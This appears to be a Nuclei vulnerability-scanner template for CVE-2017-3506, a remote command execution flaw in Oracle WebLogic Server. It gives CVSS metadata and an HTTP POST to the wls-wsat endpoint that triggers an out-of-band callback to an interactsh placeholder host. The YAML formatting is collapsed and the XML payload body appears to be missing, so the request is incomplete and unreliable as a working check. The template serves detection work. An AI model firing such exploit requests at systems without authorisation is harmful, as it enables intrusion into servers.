id: CVE-2017-3506 info: name: Oracle Fusion Middleware Weblogic Server - Remote OS Command Execution author: pdteam severity: high description: The Oracle WebLogic Server component of Oracle Fusion Middleware (Web Services) versions 10.3.6.0, 12.1.3.0, 12.2.1.0, 12.2.1.1 and 12.2.1.2 is susceptible to a difficult to exploit vulnerability that could allow unauthenticated attackers with network access via HTTP to compromise Oracle WebLogic Server. reference: - https://hackerone.com/reports/810778 - https://nvd.nist.gov/vuln/detail/CVE-2017-3506 classification: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N cvss-score: 7.4 cve-id: CVE-2017-3506 tags: cve,cve2017,weblogic,oracle,rce,oast requests: - raw: - | POST /wls-wsat/RegistrationRequesterPortType HTTP/1.1 Host: {{Hostname}} Content-Type: text/xml Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8, Content-Type: text/xml;charset=UTF-8 http://{{interactsh-url}} matchers: - type: word part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" # Enhanced by mp on 2022/04/20